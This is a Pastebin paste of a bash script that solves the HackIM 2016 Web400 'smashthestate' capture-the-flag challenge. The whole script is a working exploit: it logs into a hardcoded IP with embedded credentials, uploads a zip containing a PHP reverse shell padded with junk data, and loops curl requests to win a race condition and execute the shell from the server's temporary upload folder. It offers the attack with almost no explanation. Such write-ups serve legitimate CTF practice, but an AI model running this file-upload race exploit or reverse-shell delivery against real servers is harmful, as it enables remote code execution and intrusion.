Guest User

HackIM 2016 / Web400: smashthestate

a guest
Feb 4th, 2016
231
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. #
  3. # HackIM 2016 / Web400: smashthestate
  4. #
  5. # get reverse shell
  6. #
  7.  
  8. cat > result.html <<EOF
  9. <title>404 Not Found</title>
  10. EOF
  11.  
  12. # create zip + payload
  13. dd if=/dev/zero of=random.data bs=1k count=10000
  14.  
  15. # php reverse shell (e.g.: http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
  16. cp rev.php a.php
  17. zip a.zip random.data a.php
  18.  
  19. # login
  20. PHPSESSID=`curl -s -X POST "http://54.152.101.3/?page=login" -d "user=rob&pass=smashthestate" -c - | tail -1 | awk '{ print $7 }'`
  21. echo -n $PHPSESSID
  22.  
  23. # try race condition until success
  24. while cat result.html | grep "<title>404 Not Found</title>" > /dev/null; do
  25.     echo -n .
  26.     # upload zip
  27.     curl -s -X POST "http://54.152.101.3/?page=process_upload" -F "zipfile=@a.zip" -b "PHPSESSID=$PHPSESSID" > /dev/null &
  28.  
  29.     # exploit race condition by quickly opening a.php in tmp folder after unzip
  30.     sleep 1
  31.     curl -s -X GET "http://54.152.101.3/tmp/upload_${PHPSESSID}/a.php" > result.html
  32. done
  33.  
  34. cat result.html
  35. exit 0
RAW Paste Data